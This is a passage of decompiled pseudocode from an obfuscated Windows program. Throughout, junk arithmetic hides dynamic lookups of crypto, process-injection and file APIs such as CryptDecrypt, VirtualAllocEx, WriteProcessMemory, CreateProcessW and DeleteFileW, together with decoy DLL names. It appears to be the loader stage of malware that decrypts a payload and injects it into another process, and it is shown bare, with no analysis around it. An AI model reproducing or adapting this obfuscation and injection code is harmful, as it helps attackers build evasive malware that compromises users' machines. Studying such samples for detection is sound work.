                                                								_t1370 =  *0x4fef30; // 0xa1d816
                                                								E004FEED0 = _t1370;
                                                							}
                                                							 *0x4fef04 =  *0x4fef40 * 0x35;
                                                							 *0x505904 = GetProcAddress(_v36, "CryptReleaseContext");
                                                							_v32 = 0;
                                                							if(_v32 < 9) {
                                                								_v32 = _v32 + 1;
                                                								_t1363 =  *0x4fef4c; // 0x43c1493c
                                                								 *0x4fef4c = _t1363;
                                                								_t1364 = E004FEF38; // 0xc3c34fdc
                                                								E004FEF50 = _t1364;
                                                								_t1365 = E004FEF50; // 0xa3b3f6c0
                                                								_t1555 = _t1365 -  *0x4fef4c; // 0x43c1493c
                                                								if(_t1555 <= 0) {
                                                									_t1366 =  *0x4feee8; // 0xdcd0f434
                                                									E004FEF0C = _t1366 + E004FEF50;
                                                								} else {
                                                									_v12 = _v24 + _v28;
                                                								}
                                                							}
                                                							_t614 = E004FEF2C; // 0xa1d900
                                                							 *0x4fef4c = _t614 -  *0x4feed8;
                                                							_t616 =  *0x4fef28; // 0x3c79b5d4
                                                							_v60 = _t616 + 0xbd;
                                                							asm("fild dword [ebp-0x38]");
                                                							 *0x4feed8 = E004048CC();
                                                							_t619 = E004FEF38; // 0xc3c34fdc
                                                							 *0x4feef0 = _t619 *  *0x4fef44;
                                                							_t621 =  *0x4fef18; // 0xbc3e19a
                                                							_t1556 = _t621 -  *0x4fef04 -  *0x4feef4; // 0xb52124ca
                                                							if(_t1556 == 0) {
                                                								_t1361 = E004FEF00; // 0xa3b3f6c0
                                                								E004FEF00 = E0040489C(_t1361);
                                                							}
                                                							_t623 = E004FEF20; // 0x6e687a1a
                                                							E004FEF10 = _t623;
                                                							 *0x505908 = GetProcAddress(_v36, "CryptDestroyKey");
                                                							_v32 = 0;
                                                							do {
                                                								_t627 =  *0x4fef44; // 0x38993
                                                								 *0x4feea0 = _t627;
                                                								_v32 = _v32 + 1;
                                                							} while (_v32 != 4);
                                                							_t628 =  *0x4feefc; // 0x4b08dcc7
                                                							E004FEED0 = _t628;
                                                							_t629 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4feed8 = E0040489C(_t629);
                                                							_t631 = E004FEED0; // 0xc3c34ef0
                                                							_t1559 = _t631 -  *0x4feed8; // 0x1cb9338e
                                                							if(_t1559 > 0) {
                                                								_v16 = _v28 * 0xb2;
                                                								E00406CF4( &_v8, L"NlsData0020.dll");
                                                							}
                                                							if(0xb7 -  *0x4fef40 < 0x8c) {
                                                								_t1350 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4fef30 = _t1350 +  *0x4feeec;
                                                								_t1352 = E004FEF34; // 0xc3c34ef0
                                                								_t1562 = _t1352 -  *0x4fef48 - E004FEF34; // 0xc3c34ef0
                                                								if(_t1562 < 0) {
                                                									_t1356 = E004FEF20; // 0x6e687a1a
                                                									E004FEF50 = _t1356 - 0x44;
                                                								}
                                                								_t1354 = E004FEF00; // 0xa3b3f6c0
                                                								_t1355 = _t1354 *  *0x4fef30;
                                                								_t1564 = _t1355;
                                                								 *0x4feee0 = _t1355;
                                                							}
                                                							_t634 =  *0x4fef44; // 0x38993
                                                							 *0x4feef0 = _t634;
                                                							_push(_v12);
                                                							_t1401 =  *0x4feef0; // 0x44632301
                                                							_t1452 =  *0x4feef0; // 0x44632301
                                                							 *0x4feefc = E004EE798(_v28, _t1395, _t1401, _t1452, _t1564);
                                                							 *0x50590c = GetProcAddress(_v36, "CryptImportKey");
                                                							_v32 = 0;
                                                							if(_v32 >= 0xd) {
                                                								L36:
                                                								_t641 =  *0x4feea0; // 0xa1d900
                                                								 *0x4fef48 = _t641;
                                                								asm("fild dword [0x4feee0]");
                                                								E004FEED0 = E004048CC();
                                                								_t643 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feedc = _t643;
                                                								_t644 =  *0x4feee4; // 0x0
                                                								_v44 = _t644;
                                                								if(_v44 != 0) {
                                                									_v44 =  *((intOrPtr*)(_v44 - 4));
                                                								}
                                                								if(_v44 > 0xfe) {
                                                									 *0x4feefc =  *0x4fef28 * 0x91;
                                                								}
                                                								_t645 = E004FEF0C; // 0xb52124bf
                                                								_t1576 = _t645 -  *0x4feef0 - E004FEF0C; // 0xb52124bf
                                                								if(_t1576 >= 0) {
                                                									_t647 =  *0x4fef30; // 0xa1d816
                                                									__eflags = _t647 + E004FEF38 - E004FEF38; // 0xc3c34fdc
                                                									if(__eflags != 0) {
                                                										_push(_v12);
                                                										_t1453 = E004FEF34; // 0xc3c34ef0
                                                										E004EE798(_v16, _t1395, _v16, _t1453, __eflags);
                                                									} else {
                                                										_t1331 =  *0x4feecc; // 0xd26bafe0
                                                										_v60 = _t1331 + 4;
                                                										asm("fild dword [ebp-0x38]");
                                                										 *0x4feea0 = E004048D8();
                                                									}
                                                								} else {
                                                									_t1334 =  *0x4feef0; // 0x44632301
                                                									E004FEF20 = _t1334 + 4;
                                                								}
                                                								 *0x505910 = GetProcAddress(_v36, "CryptDecrypt");
                                                								 *0x505974 = GetProcAddress(_v36, "CryptCreateHash");
                                                								_t656 = E004FEF50; // 0xa3b3f6c0
                                                								E004FEF50 = E0040489C(_t656);
                                                								_t658 =  *0x4fef04; // 0x43c14963
                                                								 *0x4feecc = _t658;
                                                								_t659 =  *0x4feecc; // 0xd26bafe0
                                                								_t1577 = _t659 - E004FEF50; // 0xa3b3f6c0
                                                								if(_t1577 > 0) {
                                                									_t1324 =  *0x4fef4c; // 0x43c1493c
                                                									 *0x4feedc = _t1324;
                                                									_t1325 =  *0x4feee0; // 0x747938b
                                                									 *0x4feee0 = E0040489C(_t1325);
                                                									_v16 = _v24 * _v20;
                                                									_v12 = _v28 * _v32;
                                                								}
                                                								if(_v20 + _v16 < _v12 + _v20) {
                                                									_t1322 =  *0x4feee8; // 0xdcd0f434
                                                									 *0x4fef28 = _t1322 *  *0x4feee0;
                                                								}
                                                								_t662 = E004FEF34; // 0xc3c34ef0
                                                								E004FEF34 = E0040489C(_t662);
                                                								_t664 = E004FEF34; // 0xc3c34ef0
                                                								_t1581 = _t664 -  *0x4feee0; // 0x747938b
                                                								if(_t1581 >= 0) {
                                                									_t665 = E004FEED0; // 0xc3c34ef0
                                                									E004FEF20 = _t665;
                                                									_t666 =  *0x4feeec; // 0xb52124f2
                                                									E004FEF34 = _t666 + 0xa2;
                                                									_t668 = E004FEF00; // 0xa3b3f6c0
                                                									_t669 = _t668 - 0xa0;
                                                									__eflags = _t669;
                                                									 *0x4fef48 = _t669;
                                                								} else {
                                                									E00407640(_v8, L"SetLocaleInfoA");
                                                									if(_t1581 != 0) {
                                                										_t1318 =  *0x4feef0; // 0x44632301
                                                										 *0x4feefc = _t1318 +  *0x4feecc;
                                                									} else {
                                                										E00406CF4( &_v8, L"spwizeng.dll");
                                                									}
                                                								}
                                                								_t670 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feee0 = _t670 + 4;
                                                								_t672 =  *0x4feea0; // 0xa1d900
                                                								 *0x4feef4 = _t672 - 0x35;
                                                								 *0x505978 = GetProcAddress(_v36, "CryptHashData");
                                                								_t676 =  *0x4fef04; // 0x43c14963
                                                								_t1582 = _t676 + E004FEF38 - E004FEF38; // 0xc3c34fdc
                                                								if(_t1582 != 0) {
                                                									_t678 = _v20 * 0x9b;
                                                									__eflags = _t678;
                                                									_v16 = _t678;
                                                								} else {
                                                									_v32 = 0;
                                                									if(_v32 >= 4) {
                                                										L59:
                                                										_t679 =  *0x4fef44; // 0x38993
                                                										_v60 = _t679 + 4;
                                                										asm("fild dword [ebp-0x38]");
                                                										E004FEF0C = E004048D8();
                                                										_t682 =  *0x4fef14; // 0xb52124ca
                                                										 *0x4fef14 = _t682;
                                                										E00407678(_v8, 0, 1,  &_v8);
                                                										_t686 = E004FEF10; // 0x1cb931c0
                                                										E004FEF34 = _t686 + E004FEF2C;
                                                										if(_v28 - _v20 < _v28) {
                                                											_t1310 =  *0x4feedc; // 0xbc3e19a
                                                											_t1311 = _t1310 + 0xf1;
                                                											_t1586 = _t1311;
                                                											E004FEF50 = _t1311;
                                                										}
                                                										 *0x50597c = GetProcAddress(_v36, "CryptGetHashParam");
                                                										_v20 = _v28 + 4;
                                                										_v32 = _v12 + 0x4d;
                                                										_t696 =  *0x4feee8; // 0xdcd0f434
                                                										 *0x4fef30 = _t696 + 0x1d;
                                                										_t698 = E004FEF00; // 0xa3b3f6c0
                                                										 *0x4fef40 = _t698 + 4;
                                                										_t700 =  *0x4fef18; // 0xbc3e19a
                                                										_push(_t700);
                                                										 *0x4fef44 = E004EE798(_v28, _t1395, _v16, _v28, _t1586);
                                                										_t703 =  *0x4fef14; // 0xb52124ca
                                                										 *0x4feea0 = _t703;
                                                										 *0x505980 = GetProcAddress(_v36, "CryptDestroyHash");
                                                										_v20 = _v24 + 0x90;
                                                										_v16 = _v28 * _v32;
                                                										_t710 = E004FEF10; // 0x1cb931c0
                                                										E004FEF10 = E0040489C(_t710);
                                                										asm("fild dword [0x4fef4c]");
                                                										E004FEF2C = E004048CC();
                                                										_t713 = E004FEED0; // 0xc3c34ef0
                                                										 *0x4fef40 = _t713 +  *0x4fef18;
                                                										_t715 =  *0x4feeec; // 0xb52124f2
                                                										E004FEF50 = _t715 -  *0x4feeec;
                                                										 *0x505968 = GetProcAddress(_v36, "GetCurrentHwProfileW");
                                                										_v36 = GetModuleHandleW(L"kernel32.dll");
                                                										_v20 = _v28 * _v24;
                                                										_v12 = _v16 + _v32;
                                                										_t724 = E004FEF50; // 0xa3b3f6c0
                                                										E004FEF38 = _t724 *  *0x4fef3c;
                                                										_t726 =  *0x4feef4; // 0xb52124ca
                                                										 *0x4fef44 = _t726 *  *0x4feedc;
                                                										_t728 = E004FEF50; // 0xa3b3f6c0
                                                										 *0x4fef4c = _t728;
                                                										_t729 = E004FEF50; // 0xa3b3f6c0
                                                										_t1587 = _t729 + 0xd -  *0x4fef3c; // 0x1cb932a9
                                                										if(_t1587 < 0) {
                                                											E00406CF4( &_v8, L"EtwEventWriteStartScenario");
                                                										}
                                                										if(_v36 == 0) {
                                                											L189:
                                                											_v16 = _v32 + _v20;
                                                											_t733 =  *0x4fef28; // 0x3c79b5d4
                                                											_v60 = _t733 + 0x17;
                                                											asm("fild dword [ebp-0x38]");
                                                											 *0x4fef30 = E004048CC();
                                                											_t736 =  *0x4feef0; // 0x44632301
                                                											E004FEF38 = _t736;
                                                											_t737 =  *0x4feed8; // 0x1cb9338e
                                                											 *0x4fef3c = _t737;
                                                											_t738 = E004FEF38; // 0xc3c34fdc
                                                											_t1669 = _t738 -  *0x4fef3c; // 0x1cb932a9
                                                											if(_t1669 < 0) {
                                                												 *0x4feecc = 0x7a - E004FEF38;
                                                											}
                                                											_t739 = E004FEF00; // 0xa3b3f6c0
                                                											 *0x4feef0 = _t739 * E004FEF0C;
                                                											goto L192;
                                                										} else {
                                                											_v24 = _v28;
                                                											_t744 =  *0x4feefc; // 0x4b08dcc7
                                                											 *0x4fef3c = _t744;
                                                											_t745 =  *0x4fef14; // 0xb52124ca
                                                											_v60 = _t745 + 0x95;
                                                											asm("fild dword [ebp-0x38]");
                                                											 *0x4fef4c = E004048CC();
                                                											_t748 =  *0x4feea0; // 0xa1d900
                                                											_t1463 = E004FEF0C; // 0xb52124bf
                                                											_t1589 = _t748 +  *0x4feee0 - _t1463 +  *0x4feea0;
                                                											if(_t748 +  *0x4feee0 < _t1463 +  *0x4feea0) {
                                                												_push(_v28);
                                                												_t1306 =  *0x4fef14; // 0xb52124ca
                                                												 *0x4feee0 = E004EE798(_t1306, _t1395, _v24, _v12, _t1589);
                                                											}
                                                											_t750 =  *0x4feeec; // 0xb52124f2
                                                											 *0x4feeec = E0040489C(_t750);
                                                											_t752 =  *0x4feed8; // 0x1cb9338e
                                                											_v60 = _t752 + 0x2a;
                                                											asm("fild dword [ebp-0x38]");
                                                											E004FEF00 = E004048CC();
                                                											 *0x505948 = GetProcAddress(_v36, "VirtualAllocEx");
                                                											_v32 = 0;
                                                											if(_v32 >= 0xc) {
                                                												L71:
                                                												_t758 =  *0x4feefc; // 0x4b08dcc7
                                                												_push(_t758);
                                                												_t1405 =  *0x4fef3c; // 0x1cb932a9
                                                												_t1465 =  *0x4feed8; // 0x1cb9338e
                                                												_t759 =  *0x4fef14; // 0xb52124ca
                                                												 *0x4feef4 = E004EE798(_t759, _t1395, _t1405, _t1465, _t1592);
                                                												_t761 =  *0x4fef4c; // 0x43c1493c
                                                												 *0x4fef48 = _t761;
                                                												_t762 = E004FEF38; // 0xc3c34fdc
                                                												 *0x4fef4c = _t762;
                                                												_t763 =  *0x4feed8; // 0x1cb9338e
                                                												 *0x4feecc = _t763 + 0x4c;
                                                												_t765 =  *0x4fef30; // 0xa1d816
                                                												_push(_t765);
                                                												_t1466 = E004FEF38; // 0xc3c34fdc
                                                												_t766 =  *0x4feee0; // 0x747938b
                                                												 *0x4fef48 = E004EE798(_t766, _t1395, _v16, _t1466, _t1592);
                                                												 *0x50594c = GetProcAddress(_v36, "WriteProcessMemory");
                                                												 *0x50591c = GetProcAddress(_v36, "VirtualAlloc");
                                                												_t772 =  *0x4fef30; // 0xa1d816
                                                												_t1467 =  *0x4fef40; // 0x3c79b5d4
                                                												if(_t772 +  *0x4fef14 >= _t1467 +  *0x4fef30) {
                                                													_t774 = E004FEF34; // 0xc3c34ef0
                                                													__eflags = _t774 -  *0x4fef30 - E004FEF34; // 0xc3c34ef0
                                                													if(__eflags < 0) {
                                                														_t1272 =  *0x4feeec; // 0xb52124f2
                                                														_t1273 = _t1272 -  *0x4fef04;
                                                														__eflags = _t1273;
                                                														E004FEF50 = _t1273;
                                                													}
                                                													_t776 = E004FEF34; // 0xc3c34ef0
                                                													E004FEED0 = _t776;
                                                													_t777 =  *0x4fef48 * 0x91;
                                                													__eflags = _t777;
                                                													 *0x4feee8 = _t777;
                                                													_t778 =  *0x4feef4; // 0xb52124ca
                                                													 *0x4feef4 = E0040489C(_t778);
                                                													L83:
                                                													_t780 =  *0x4feee4; // 0x0
                                                													_v52 = _t780;
                                                													if(_v52 != 0) {
                                                														_v52 =  *((intOrPtr*)(_v52 - 4));
                                                													}
                                                													if(_v52 == 0x3f) {
                                                														_t1260 =  *0x4fef40; // 0x3c79b5d4
                                                														E004FEF20 = _t1260;
                                                														_t1261 =  *0x4fef14; // 0xb52124ca
                                                														E004FEF2C = _t1261;
                                                														_t1262 =  *0x4feee0; // 0x747938b
                                                														E004FEF34 = _t1262;
                                                														_t1263 = E004FEF34; // 0xc3c34ef0
                                                														_t1602 = _t1263 - E004FEF2C; // 0xa1d900
                                                														if(_t1602 < 0) {
                                                															_t1267 =  *0x4fef3c; // 0x1cb932a9
                                                															E004FEF50 = _t1267 +  *0x4feefc;
                                                														}
                                                														_t1264 =  *0x4fef28; // 0x3c79b5d4
                                                														_v60 = _t1264 + 0xee;
                                                														asm("fild dword [ebp-0x38]");
                                                														 *0x4feee0 = E004048CC();
                                                													}
                                                													_t781 =  *0x4feed8; // 0x1cb9338e
                                                													 *0x4fef04 =  *0x4fef04 + _t781;
                                                													_t782 = E004FEED0; // 0xc3c34ef0
                                                													E004FEF10 = _t782;
                                                													_t783 = E004FEF10; // 0x1cb931c0
                                                													_t1605 = _t783 - E004FEF2C; // 0xa1d900
                                                													if(_t1605 >= 0) {
                                                														asm("fild dword [0x4feee0]");
                                                														 *0x4feea0 = E004048CC();
                                                													} else {
                                                														_t1258 =  *0x4fef48; // 0xc3c34ef0
                                                														 *0x4fef30 = _t1258 - 0x4f;
                                                													}
                                                													_t785 =  *0x4feea0; // 0xa1d900
                                                													 *0x4feeec = _t785 *  *0x4feea0;
                                                													 *0x4fef04 = 0x7b - E004FEF50;
                                                													 *0x505920 = GetProcAddress(_v36, "VirtualFree");
                                                													_t791 = E004FEF50; // 0xa3b3f6c0
                                                													E004FEF50 = E0040489C(_t791);
                                                													_t793 = E004FEF34; // 0xc3c34ef0
                                                													 *0x4feea0 = _t793;
                                                													_t794 =  *0x4feea0; // 0xa1d900
                                                													_t1606 = _t794 - E004FEF50; // 0xa3b3f6c0
                                                													if(_t1606 <= 0) {
                                                														__eflags = 0xa6 - E004FEF38 - 0xd3;
                                                														if(0xa6 - E004FEF38 < 0xd3) {
                                                															_t1239 =  *0x4feec4; // 0x0
                                                															_v56 = _t1239;
                                                															__eflags = _v56;
                                                															if(_v56 != 0) {
                                                																_t1244 = _v56 - 4;
                                                																__eflags = _t1244;
                                                																_v56 =  *_t1244;
                                                															}
                                                															__eflags = _v56 - 0x32;
                                                															if(__eflags > 0) {
                                                																_push(_v32);
                                                																_t1434 =  *0x4feefc; // 0x4b08dcc7
                                                																_t1516 = E004FEF0C; // 0xb52124bf
                                                																_t1241 = E004FEF10; // 0x1cb931c0
                                                																 *0x4fef28 = E004EE798(_t1241, _t1395, _t1434, _t1516, __eflags);
                                                															}
                                                														}
                                                													} else {
                                                														_push(_v12);
                                                														E004EE798(_v16, _t1395, _v16, _v28, _t1606);
                                                														_t1249 =  *0x4feefc; // 0x4b08dcc7
                                                														_push(_t1249);
                                                														_t1250 =  *0x4feeec; // 0xb52124f2
                                                														E004EE798(_t1250, _t1395, _v24, _v24, _t1606);
                                                														_v16 = _v20 + 0xbb;
                                                														_t1254 =  *0x4feea0; // 0xa1d900
                                                														 *0x4fef14 = _t1254 +  *0x4feea0;
                                                														_t1256 =  *0x4feedc; // 0xbc3e19a
                                                														E004FEF2C = _t1256 - E004FEF34;
                                                													}
                                                													_t797 =  *0x4feee8; // 0xdcd0f434
                                                													E004FEF20 = _t797 *  *0x4fef28;
                                                													E00406CF4( &_v8, L"CNBJOP78.DLL");
                                                													_t801 =  *0x4feefc; // 0x4b08dcc7
                                                													E004FEF34 = _t801;
                                                													_t802 =  *0x4fef30; // 0xa1d816
                                                													 *0x4fef44 = _t802 +  *0x4fef30;
                                                													_t804 =  *0x4feefc; // 0x4b08dcc7
                                                													 *0x4fef4c = _t804;
                                                													 *0x505924 = GetProcAddress(_v36, "VirtualProtect");
                                                													_v20 = _v24 + _v32;
                                                													_t809 = E004FEF10; // 0x1cb931c0
                                                													_t1607 = _t809 -  *0x4fef14 - E004FEF10; // 0x1cb931c0
                                                													if(_t1607 < 0) {
                                                														E004FEF34 =  *0x4fef48 * 0xbf;
                                                													}
                                                													_t811 = E004FEF34; // 0xc3c34ef0
                                                													E004FEF50 = _t811 + 0x89;
                                                													 *0x4feee0 =  *0x4fef14 * 0x54;
                                                													_t814 =  *0x4fef14; // 0xb52124ca
                                                													E004FEF00 = _t814 * E004FEED0;
                                                													 *0x505928 = GetProcAddress(_v36, "LoadLibraryA");
                                                													 *0x50592c = GetProcAddress(_v36, "FreeLibrary");
                                                													 *0x505930 = GetProcAddress(_v36, "HeapFree");
                                                													E00407678(_v8, 0, 1,  &_v8);
                                                													E00406CF4( &_v8, L"ZwClearEvent");
                                                													_v12 = 0;
                                                													do {
                                                														_v16 = _v32 * _v20;
                                                														_v12 = _v12 + 1;
                                                													} while (_v12 != 7);
                                                													_t830 =  *0x4feefc; // 0x4b08dcc7
                                                													_t1611 = _t830 + 0xe9 -  *0x4feee8; // 0xdcd0f434
                                                													if(_t1611 >= 0) {
                                                														__eflags = _v28 - _v28 - _v28;
                                                														if(_v28 - _v28 >= _v28) {
                                                															_t834 =  *0x4feedc; // 0xbc3e19a
                                                															 *0x4feedc = E0040489C(_t834);
                                                														} else {
                                                															E004FEF50 =  *0x4fef40 * 0xe;
                                                														}
                                                													} else {
                                                														_t1236 =  *0x4fef44; // 0x38993
                                                														E004FEF20 = _t1236 + 0x45;
                                                													}
                                                													_t836 =  *0x4feef0; // 0x44632301
                                                													E004FEF0C = _t836 +  *0x4fef28;
                                                													_t838 =  *0x4fef4c; // 0x43c1493c
                                                													 *0x4fef14 = _t838;
                                                													 *0x505934 = GetProcAddress(_v36, "GetProcessHeap");
                                                													_v32 = 0;
                                                													_t1612 = _v32 - 0xe;
                                                													if(_v32 < 0xe) {
                                                														_v32 = _v32 + 1;
                                                														E00407678(_v8, 0, 1,  &_v8);
                                                														asm("fild dword [ebp-0x10]");
                                                														_v12 = E004048D8();
                                                													}
                                                													_t842 = E004FEF50; // 0xa3b3f6c0
                                                													 *0x4fef04 = _t842 - 0x65;
                                                													E00407678(_v8, 0, 1,  &_v8);
                                                													_t847 =  *0x4fef3c; // 0x1cb932a9
                                                													_v60 = _t847 + 4;
                                                													asm("fild dword [ebp-0x38]");
                                                													 *0x4fef28 = E004048D8();
                                                													_t850 =  *0x4fef4c; // 0x43c1493c
                                                													 *0x4fef3c = _t850 -  *0x4feef4;
                                                													_t852 = E004FEED0; // 0xc3c34ef0
                                                													 *0x4fef4c = _t852 *  *0x4feecc;
                                                													 *0x505938 = GetProcAddress(_v36, "GetNativeSystemInfo");
                                                													_v20 = _v32 + _v24;
                                                													_v28 = _v12 * 0xe3;
                                                													_t859 =  *0x4feef0; // 0x44632301
                                                													 *0x4feee8 = _t859 - 0x20;
                                                													 *0x4feefc =  *0x4fef04 * 0x1e;
                                                													_push(_v16);
                                                													_t1409 = E004FEF34; // 0xc3c34ef0
                                                													_t1478 =  *0x4fef18; // 0xbc3e19a
                                                													 *0x4feee0 = E004EE798(_v32, _t1395, _t1409, _t1478, _t1612);
                                                													_t865 = E004FEF34; // 0xc3c34ef0
                                                													E004FEF10 = _t865;
                                                													 *0x50593c = GetProcAddress(_v36, "IsBadReadPtr");
                                                													 *0x505940 = GetProcAddress(_v36, "GetProcAddress");
                                                													E00406CF4( &_v8, L"InvalidateRect");
                                                													_v12 = 0;
                                                													do {
                                                														_v60 = _v32 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														_v16 = E004048D8();
                                                														_v12 = _v12 + 1;
                                                													} while (_v12 != 9);
                                                													_t876 =  *0x4feef4; // 0xb52124ca
                                                													 *0x4feef4 = _t876;
                                                													_v20 = 0;
                                                													if(_v20 < 2) {
                                                														_v20 = _v20 + 1;
                                                														_t1227 =  *0x4feecc; // 0xd26bafe0
                                                														 *0x4fef28 = _t1227 *  *0x4fef28;
                                                														_t1229 = E004FEF20; // 0x6e687a1a
                                                														 *0x4fef3c = _t1229 + 4;
                                                													}
                                                													_t878 =  *0x4fef3c; // 0x1cb932a9
                                                													_t1616 = _t878 + E004FEF50 - E004FEF50; // 0xa3b3f6c0
                                                													if(_t1616 == 0) {
                                                														E00406CF4( &_v8, _v8);
                                                													}
                                                													_t880 = E004FEF00; // 0xa3b3f6c0
                                                													_v60 = _t880 + 4;
                                                													asm("fild dword [ebp-0x38]");
                                                													 *0x4feee8 = E004048D8();
                                                													 *0x505954 = GetProcAddress(_v36, "GetCurrentProcess");
                                                													_t885 =  *0x4feea0; // 0xa1d900
                                                													E004FEF2C = _t885;
                                                													_v28 = 0;
                                                													if(_v28 >= 0xd) {
                                                														L122:
                                                														_t887 =  *0x4fef30; // 0xa1d816
                                                														 *0x4fef3c = _t887;
                                                														asm("fild dword [0x4fef40]");
                                                														E004FEF50 = E004048D8();
                                                														E00406CF4( &_v8, _v8);
                                                														 *0x505950 = GetProcAddress(_v36, "ReadProcessMemory");
                                                														_v20 = _v32 - 0xa1;
                                                														_v24 = _v12 * 0xca;
                                                														_t896 = E004FEF38; // 0xc3c34fdc
                                                														E004FEF34 = _t896 -  *0x4fef44;
                                                														_t898 =  *0x4fef48; // 0xc3c34ef0
                                                														_v60 = _t898 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														 *0x4fef44 = E004048D8();
                                                														_t901 =  *0x4fef18; // 0xbc3e19a
                                                														 *0x4fef4c = _t901;
                                                														E00406CF4( &_v8, _v8);
                                                														 *0x505970 = GetProcAddress(_v36, "GetWindowsDirectoryW");
                                                														asm("fild dword [ebp-0x14]");
                                                														_v16 = E004048D8();
                                                														_push(_v24);
                                                														_t908 = E004FEF34; // 0xc3c34ef0
                                                														 *0x4fef48 = E004EE798(_t908, _t1395, _v24, _v20, _t1621);
                                                														_t910 = E004FEF10; // 0x1cb931c0
                                                														E004FEF10 = E0040489C(_t910);
                                                														_v60 = _v32 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														_v28 = E004048D8();
                                                														if(_v24 + _v28 <= _v28) {
                                                															_push(_v28);
                                                															_t1411 = E004FEF50; // 0xa3b3f6c0
                                                															_t918 = E004FEF34; // 0xc3c34ef0
                                                															E004EE798(_t918, _t1395, _t1411, _v32, __eflags);
                                                														} else {
                                                															_t1215 =  *0x4fef30; // 0xa1d816
                                                															_t1623 = _t1215 + 0xbb - E004FEF0C; // 0xb52124bf
                                                															if(_t1623 < 0) {
                                                																_t1217 =  *0x4feed8; // 0x1cb9338e
                                                																 *0x4fef4c = _t1217 *  *0x4feee0;
                                                															}
                                                														}
                                                														_t920 =  *0x4fef48; // 0xc3c34ef0
                                                														 *0x4feefc = _t920 +  *0x4fef28;
                                                														 *0x50596c = GetProcAddress(_v36, "GetShortPathNameW");
                                                														 *0x505984 = GetProcAddress(_v36, "CreateProcessW");
                                                														_v32 = 0;
                                                														do {
                                                															_t927 = E004FEF34; // 0xc3c34ef0
                                                															E004FEF2C = _t927;
                                                															_t928 =  *0x4fef48; // 0xc3c34ef0
                                                															 *0x4fef40 = _t928 + E004FEF2C;
                                                															_t930 =  *0x4fef18; // 0xbc3e19a
                                                															 *0x4fef48 = _t930;
                                                															_v32 = _v32 + 1;
                                                														} while (_v32 != 0xe);
                                                														_t931 =  *0x4fef14; // 0xb52124ca
                                                														E004FEED0 = _t931 + 0x35;
                                                														_t933 = E004FEF10; // 0x1cb931c0
                                                														 *0x4feef0 = _t933 + E004FEF0C;
                                                														_t935 =  *0x4feef4; // 0xb52124ca
                                                														 *0x4feef4 = _t935;
                                                														_t936 = E004FEF10; // 0x1cb931c0
                                                														_v60 = _t936 + 4;
                                                														asm("fild dword [ebp-0x38]");
                                                														E004FEF0C = E004048D8();
                                                														_t939 =  *0x4fef14; // 0xb52124ca
                                                														 *0x4fef14 = E0040489C(_t939);
                                                														 *0x505988 = GetProcAddress(_v36, "GetTempPathW");
                                                														_v32 = 0;
                                                														_t944 = E004FEF38; // 0xc3c34fdc
                                                														E004FEF50 = _t944;
                                                														_t945 = E004FEF20; // 0x6e687a1a
                                                														 *0x4feea0 = _t945;
                                                														_t946 =  *0x4feea0; // 0xa1d900
                                                														_t1626 = _t946 - E004FEF50; // 0xa3b3f6c0
                                                														if(_t1626 > 0) {
                                                															_push(_v24);
                                                															E004EE798(_v12, _t1395, _v12, _v28, _t1626);
                                                														}
                                                														if(0x62 - _v20 >= 0x2a) {
                                                															__eflags = 0xf1;
                                                															E004FEF34 = 0xf1 - E004FEF2C;
                                                														} else {
                                                															_v20 = _v16 - 0x5a;
                                                														}
                                                														_t951 =  *0x4fef3c; // 0x1cb932a9
                                                														 *0x4fef44 = _t951;
                                                														_t952 =  *0x4feea0; // 0xa1d900
                                                														_t1628 = _t952 -  *0x4fef44; // 0x38993
                                                														if(_t1628 >= 0) {
                                                															_t953 = E004FEED0; // 0xc3c34ef0
                                                															E004FEF00 = _t953;
                                                														} else {
                                                															E00407640(_v8, L"System.ComponentModel.DataAnnotations.ni.dll");
                                                															if(_t1628 == 0) {
                                                																_t1207 = E004FEF10; // 0x1cb931c0
                                                																_push(_t1207);
                                                																_t1510 =  *0x4fef28; // 0x3c79b5d4
                                                																_t1208 =  *0x4feee0; // 0x747938b
                                                																E004EE798(_t1208, _t1395, _v32, _t1510, _t1628);
                                                															}
                                                														}
                                                														_t954 = E004FEF34; // 0xc3c34ef0
                                                														_push(_t954);
                                                														_t1484 =  *0x4fef30; // 0xa1d816
                                                														_t955 =  *0x4fef4c; // 0x43c1493c
                                                														E004EE798(_t955, _t1395, _v32, _t1484, _t1628);
                                                														asm("fild dword [0x4fef18]");
                                                														E004FEF2C = E004048CC();
                                                														_t958 =  *0x4fef30; // 0xa1d816
                                                														 *0x4fef3c = _t958 +  *0x4feed8;
                                                														 *0x5058fc = GetProcAddress(_v36, "SetFileAttributesW");
                                                														_v20 = _v28 - 0xad;
                                                														_v24 = _v16 - 0x73;
                                                														_t966 =  *0x4feef0; // 0x44632301
                                                														 *0x4fef28 = _t966 + 4;
                                                														_t968 =  *0x4fef04; // 0x43c14963
                                                														 *0x4fef3c = _t968 + 0x42;
                                                														 *0x4fef4c = 0x40 -  *0x4fef18;
                                                														_t972 = E004FEF34; // 0xc3c34ef0
                                                														 *0x4feed8 = _t972 + 0x3e;
                                                														 *0x4fee94 = GetProcAddress(_v36, "DeleteFileW");
                                                														 *0x4fee9c = GetProcAddress(_v36, "ReadFile");
                                                														 *0x4feea4 = GetProcAddress(_v36, "WriteFile");
                                                														if(_v32 - _v16 == _v28) {
                                                															_t1197 = E004FEF50; // 0xa3b3f6c0
                                                															 *0x4fef3c = _t1197;
                                                															_t1198 =  *0x4fef28; // 0x3c79b5d4
                                                															 *0x4fef44 = _t1198;
                                                															_t1199 =  *0x4fef3c; // 0x1cb932a9
                                                															_t1630 = _t1199 -  *0x4fef44; // 0x38993
                                                															if(_t1630 < 0) {
                                                																_t1201 = E00407774(L"ipconfig.exe", 1, _v8);
                                                																_t1631 = _t1201 - 0xfa;
                                                																if(_t1201 == 0xfa) {
                                                																	_t1203 = _v12 - 0xdc;
                                                																	__eflags = _t1203;
                                                																	_v20 = _t1203;
                                                																} else {
                                                																	_v16 = _v32 * 0xcd;
                                                																}
                                                															}
                                                														}
                                                														asm("fild dword [0x4fef14]");
                                                														 *0x4fef3c = E004048D8();
                                                														_t983 =  *0x4fef40; // 0x3c79b5d4
                                                														 *0x4fef48 = _t983;
                                                														_t984 =  *0x4feea0; // 0xa1d900
                                                														E004FEED0 = _t984 +  *0x4fef28;
                                                														 *0x4feeac = GetProcAddress(_v36, "CloseHandle");
